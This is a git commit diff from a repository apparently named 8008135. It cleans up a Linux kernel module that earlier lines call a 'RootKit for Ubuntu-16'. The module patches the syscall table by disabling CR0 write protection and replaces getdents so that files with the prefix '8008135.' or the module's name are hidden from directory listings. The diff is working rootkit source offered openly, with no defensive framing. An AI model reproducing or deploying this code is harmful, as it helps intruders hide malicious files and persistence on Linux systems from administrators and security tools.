valentin_lechner/8008135
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

cleaning up

Browse Source
This commit is contained in:
Valentin Lechner 2019-11-19 15:58:29 +01:00
parent 9c2a8e74a8
commit 7126d0197c
1 changed files with 85 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

101
8008135.c
View File

@ -1,3 +1,24 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**** Includes ***************************************************************
*******************************************************************************/
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kallsyms.h>
@ -6,58 +27,97 @@
#include <linux/fs.h>
#include "sysgen.h"
/**** Defines *****************************************************************
*******************************************************************************/
#define GETDENTS_SYSCALL_NUM 78
#define WRITE_PROTECT_FLAG (1<<16)
#define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX)-1)
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
/**** Modinfo ****************************************************************
*******************************************************************************/
MODULE_LICENSE("GPLv3");
MODULE_AUTHOR("JanKoernerEnterprises");
MODULE_DESCRIPTION("8008135");
MODULE_VERSION("0.1");
/**** type *******************************************************************
*******************************************************************************/
struct linux_dirent {
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
unsigned short d_reclen; // d_reclen is the way to tell the length of this entry
char d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
};
MODULE_AUTHOR("JKE");
MODULE_LICENSE("GPL v2");
MODULE_DESCRIPTION("RootKit for Ubuntu-16");
typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
/**** var ********************************************************************
*******************************************************************************/
typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count);
sys_getdents_t sys_getdents_orig = NULL;
// our new getdents handler
asmlinkage long sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) {
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count) {
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) // if it has the hide prefix
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) { // or if it has the module name anywhere in it
// if it has hide prefix or module name anywhere, hide it
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
// remove this entry by copying everything after it forward
memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen));
// and adjust the length reported
memcpy(dbuf + boff, dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
return ret;
}
static int __init lkm_example_init(void) {
/*** FUNCTION ****************************************************************
* NAME: 8008135_init
* DESCRIPTION: initializing Kernel Module
* PARAMETERS: -
* RETURNS: int
*******************************************************************************/
static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
@ -78,7 +138,14 @@ static int __init lkm_example_init(void) {
return 0;
}
static void __exit lkm_example_exit(void) {
/*** FUNCTION ****************************************************************
* NAME: 8008135_exit
* DESCRIPTION: unloading Kernel Module
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
static void __exit exit_8008135(void) {
// allow us to write to read onlu pages
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
@ -88,5 +155,7 @@ static void __exit lkm_example_exit(void) {
printk(KERN_INFO "Old syscall back\n");
}
module_init(lkm_example_init);
module_exit(lkm_example_exit);
// Setting pointers to init-/exit-functions
module_init(init_8008135);
module_exit(exit_8008135);